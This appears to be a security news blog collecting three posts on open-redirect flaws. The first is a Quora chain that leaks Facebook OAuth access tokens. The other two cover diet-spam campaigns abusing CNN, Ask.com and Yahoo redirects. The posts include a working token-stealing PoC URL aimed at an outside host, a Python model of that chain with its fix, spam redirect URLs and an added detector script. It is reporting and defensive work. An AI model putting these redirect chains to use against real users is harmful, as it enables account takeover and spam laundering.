Posts with label: Open Redirect vulnerability

Researcher found a way to Hack Facebook accounts with the help of Quora


Indian security researcher Prakhar Prasad has found a way to hack Facebook accounts by exploiting an open redirection flaw in Quora, one of the most popular question-and-answer websites.

Quora allows users to sign up through their Facebook account. While signing up for Quora, the researcher noticed that quora.com was permitted to receive an access token from Facebook's OAuth flow.

Prasad managed to steal that access token by chaining the OAuth flow with an open-redirect flaw on quora.com.

PoC URL provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

"The Facebook OAuth authorization URL requests token permission from the user, but as the user will have the Quora app installed, it will redirect to the value specified in the next parameter of the OAuth authorization URL with a valid access_token," the researcher said in his blog.

In this case the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora". Because the request uses response_type=token (the implicit grant), Facebook sends the user to that URL with the access token in the URL fragment. Quora's /contacts/skip endpoint then redirects to whatever the goto parameter says, without checking that it points back to quora.com (the open redirect). Browsers carry the fragment of the requested URL over to a redirect target that has no fragment of its own, so the token travels along to Prasad's page. That page captures the access token and sends the user on to facebook.com, so nothing looks out of the ordinary.
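The chain above, as an added example that is not code from the post, from Quora or from Facebook: facebook_dialog and the two quora_skip_* handlers are constructed stand-ins for the real endpoints, the token is a placeholder string, and the browser() helper only models the one redirect rule that matters here (fragment inheritance across a 302). The second handler shows the fix, restricting goto to a path on the same site.

```python
"""Model of the OAuth implicit-grant + open-redirect chain (constructed example)."""
from urllib.parse import urlparse, parse_qs, urlencode

# The researcher's PoC URL, as quoted in the post.
POC_URL = ("https://www.facebook.com/dialog/permissions.request?app_id=136609459636"
           "&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora"
           "&response_type=token")
TOKEN = "ACCESS_TOKEN_PLACEHOLDER"   # constructed; stands in for a real access_token


def facebook_dialog(url):
    """Stand-in for the OAuth dialog when the user already installed the app:
    with response_type=token Facebook 302s to `next` and puts the token in the
    URL fragment (implicit grant)."""
    q = parse_qs(urlparse(url).query)
    assert q["response_type"] == ["token"]
    return q["next"][0] + "#" + urlencode({"access_token": TOKEN})


def quora_skip_vulnerable(url):
    """The open redirect: sends the browser wherever `goto` points."""
    return parse_qs(urlparse(url).query).get("goto", ["/"])[0]


def quora_skip_fixed(url):
    """Hardened: only a path on this site is accepted; absolute URLs,
    scheme-relative '//host' and backslash tricks fall back to '/'."""
    target = parse_qs(urlparse(url).query).get("goto", ["/"])[0]
    p = urlparse(target)
    if (p.scheme or p.netloc or "\\" in target
            or not target.startswith("/") or target.startswith("//")):
        return "/"
    return target


def browser(start, handlers, max_hops=10):
    """Follow redirects the way a browser does.  `handlers` maps 'host/path' to a
    function returning the Location header.  A Location without a fragment
    inherits the fragment of the URL just requested (RFC 7231 section 7.1.2),
    which is how the token survives the hop through quora.com.  Stops at the
    first URL nobody handles, e.g. the attacker's page."""
    url = start
    for _ in range(max_hops):
        parts = urlparse(url)
        handler = handlers.get(parts.netloc + parts.path)
        if handler is None:
            return url
        location = handler(url)
        if not urlparse(location).netloc:                 # relative Location
            location = f"{parts.scheme}://{parts.netloc}{location}"
        if "#" not in location and parts.fragment:
            location += "#" + parts.fragment
        url = location
    raise RuntimeError("too many redirects")


def run(skip_handler):
    """Returns (host that finally receives the browser, access_token seen there)."""
    final = browser(POC_URL, {"www.facebook.com/dialog/permissions.request": facebook_dialog,
                              "www.quora.com/contacts/skip": skip_handler})
    p = urlparse(final)
    return p.netloc, parse_qs(p.fragment).get("access_token", [None])[0]


if __name__ == "__main__":
    print("vulnerable:", run(quora_skip_vulnerable))   # token lands on the attacker's host
    print("fixed:     ", run(quora_skip_fixed))        # token stays on quora.com
```

Note that the fix does not strip the token from the fragment; it still reaches the browser, but only a quora.com page can read it, which is the trust boundary the OAuth app whitelist was supposed to enforce.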

Unwitting users who follow the PoC link soon find their Facebook account hacked.

Complete technical details can be found in his personal blog.

A video demo was also published alongside the write-up.


Quora patched the flaw a few days after Prasad reported the bug.

Diet Spam now exploits ask.com open redirect vulnerability


Yes, one cannot simply ignore open redirect vulnerabilities. For those who think an open redirect is not a critical bug, the recent spam campaign is the best example of how low-severity bugs get abused by cybercriminals.

"These issues are not a direct threat to the site itself. Users are targets; sites should protect them," security researcher Janne Ahlberg said.

A few days ago we reported that spammers were exploiting CNN's open redirect vulnerability to spread diet spam. CNN fixed the bug after we managed to contact them with the help of Mikko Hyppönen.

However, fixing the bug at CNN is not going to stop the campaign. Plenty of top websites are vulnerable to open redirects, so cybercriminals will find another open door as soon as we close one.

Today we were notified by Janne that attackers are now exploiting an open redirect bug in Ask.com, one of the top web search engines (Alexa rank 29).


The attackers are using the same tweet content but have changed the link:

"I plan to lose atleast 40 pounds with your diet program! hxxx://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&sv=0a5c407b&ip=5f19241a&id=94E847AC91F239E2B20A30571533AFB0&q=How+long+did+Mark+Twain+insist+his+life+story+go+unpublished%3F&p=1&qs=3045&ac=254&g=1a39vz0X%y%zxm&en=qotd&io=0&ep=&eo=&b=a001&bc=&br=&tp=171&ec=1&pt=hxxx://tumblrhealth.me&ex=&url=&u=hxxx://tumblrhealth.me …"

Apparently, the vulnerability was reported to the company by a security researcher, sony, back in 2010, but they failed to fix it.

I have also discovered that CNN has one more unfixed open redirect flaw:
"http://cgi.money.cnn.com/tools/redirect.jsp?url=http://www.google.com"

Plenty of websites fail to take care of their security. Many don't even have an email address or a contact form to which bug reports can be sent. It is time to create a dedicated address for reporting bugs, e.g. security@your-site.com.

CyberCriminals leverage CNN Open Redirect vulnerability for spreading spam

Today, I (@BreakTheSec) came across a diet spam campaign that leverages an open redirect vulnerability in CNN, one of the top news organizations.

"The diet porgram you told us about yesterday is soo good! hxxx://cgi.cnn.com/cgi-bin/redir?URL=hxxx://tumblrhealth.me" reads one of the tweets posted from the spammers' Twitter account.

The tweet shows that the cyber criminals are using the open redirect flaw on CNN's site to send Twitter users to diet spam websites.


"I love myself even more after I started your diet porgram [link]" other spam tweets read, and "Yahoo made an article about how amazing your new diet program is!! You look amazing".

The technique gives the cybercriminals several advantages:
  • It borrows the trust of a well-known domain: the visible link points at cnn.com, not at the scam site.
  • URL filtering and reputation checks don't block the click, because the request goes to CNN. The CNN endpoint then redirects the user to the scam website.

After further research, I discovered that the spammers have also managed to exploit an open redirection flaw in Yahoo:

"hxxx://us.ard.yahoo.com/SIG=15ohh3h62/M=722732.13975606.14062129.13194555/D=regst/S=150002347:R2/Y=YAHOO/EXP=1275539597/L=hnNys0Kjqbp5Cok8Sr10cAJDTPYa3UwHFG0AANhn/B=VSDoPmKJiUs-/J=1275532397077354/K=rS6pwy3MN2NPP7SBqBCOAQ/A=6097785/R=0/SIG=11o4aqdmv/*hxxx://bit.ly/HealthDiet2"
This is not the first time the CNN website has been abused by cyber criminals. In 2010, spammers exploited an open-redirect vulnerability in "ads.cnn.com".
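A detector for the laundering pattern described in this post and in the Ask.com post above, added here as an example and not code from the blog: it pulls URLs out of tweet text, refangs the hxxx:// defanging used on this page, and reports every outer URL that carries a second, off-domain URL either in a query parameter (the CNN and Ask.com cases) or spliced into its path (the Yahoo ad-server case). The sample lines are the spam tweets and URLs quoted on this page, kept verbatim; the base_domain helper is a deliberate simplification (last two labels) rather than a public-suffix lookup.

```python
"""Detect trusted-domain URLs that redirect to an off-domain target (added example)."""
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample input: the spam tweets and URLs quoted on this page, defanged as there.
SAMPLE_LINES = [
    "The diet porgram you told us about yesterday is soo good! "
    "hxxx://cgi.cnn.com/cgi-bin/redir?URL=hxxx://tumblrhealth.me",
    "I plan to lose atleast 40 pounds with your diet program! hxxx://wzus1.ask.com/r?t=p&d=us&s=a"
    "&c=a&l=dir&o=0&sv=0a5c407b&ip=5f19241a&id=94E847AC91F239E2B20A30571533AFB0&q=How+long+did"
    "+Mark+Twain+insist+his+life+story+go+unpublished%3F&p=1&qs=3045&ac=254&g=1a39vz0X%y%zxm"
    "&en=qotd&io=0&ep=&eo=&b=a001&bc=&br=&tp=171&ec=1&pt=hxxx://tumblrhealth.me&ex=&url="
    "&u=hxxx://tumblrhealth.me",
    "hxxx://us.ard.yahoo.com/SIG=15ohh3h62/M=722732.13975606.14062129.13194555/D=regst"
    "/S=150002347:R2/Y=YAHOO/EXP=1275539597/L=hnNys0Kjqbp5Cok8Sr10cAJDTPYa3UwHFG0AANhn"
    "/B=VSDoPmKJiUs-/J=1275532397077354/K=rS6pwy3MN2NPP7SBqBCOAQ/A=6097785/R=0/SIG=11o4aqdmv"
    "/*hxxx://bit.ly/HealthDiet2",
]

REFANG = re.compile(r"hxx[xp]s?://", re.I)                       # hxxx:// hxxp:// hxxps://
OUTER_RE = re.compile(r"(?:https?|hxx[xp]s?)://[^\s\"'“”]+")       # a URL in free text
INNER_RE = re.compile(r"https?://(?P<host>[^/?#&\s\"']+)")         # scheme + host of an embedded URL


def base_domain(host):
    """Crude registrable domain: last two labels (no public-suffix list)."""
    return ".".join(host.lower().split(".")[-2:])


def redirect_targets(outer_url):
    """Return [(where, target_host), ...] for every absolute URL embedded in
    outer_url whose domain differs from the outer host's domain.  `where` is the
    query parameter name, or 'path' for URLs spliced into the path."""
    url = REFANG.sub("http://", outer_url)
    p = urlparse(url)
    via = base_domain(p.netloc)
    hits = []
    for name, values in parse_qs(p.query).items():        # parse_qs already percent-decodes
        for value in values:
            m = INNER_RE.match(value)
            if m and base_domain(m["host"]) != via:
                hits.append((name, m["host"]))
    for m in INNER_RE.finditer(unquote(p.path)):          # e.g. ad-server '/*http://...' style
        if base_domain(m["host"]) != via:
            hits.append(("path", m["host"]))
    return hits


def scan(lines):
    """Run the detector over text lines; one finding per laundered target."""
    findings = []
    for n, line in enumerate(lines, 1):
        for outer in OUTER_RE.findall(line):
            via_host = urlparse(REFANG.sub("http://", outer)).netloc
            for where, target in redirect_targets(outer):
                findings.append({"line": n, "via": via_host, "param": where, "target": target})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f['line']}: {f['via']} -> {f['target']} (via {f['param']})")
```

In a mail or tweet filter this is the signal to act on: the visible host is cnn.com, ask.com or yahoo.com, but the destination is tumblrhealth.me or a bit.ly shortener, so reputation should be judged on the target, not the domain the user sees.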

*Update: security researcher Janne Ahlberg discovered that @50Cent, who has 7.6M followers, fell victim to this spam campaign and retweeted the spam tweet. A screenshot shows the tweet posted on 23 May 2013; at the time of writing, the tweet still appears in the account.

*Update 2:
It appears the cybercriminals' campaign, which mentions various celebrities and media organizations in its tweets, is succeeding: one more celebrity has fallen victim to it.

"“@honshadey: @ChiefKeef So happy you released a diet program! THANKS! hxxx://cgi.cnn.com/cgi-bin/redir?URL=hxxx://tumblrhealth.me …” Bitch U Know i aint Got no Diet Program 😒" replied Keith Cozart, the American rapper from Chicago better known by his stage name Chief Keef, to the spam tweet.

Unfortunately, more than 400 followers have retweeted the post, which helps the spammers spread their campaign.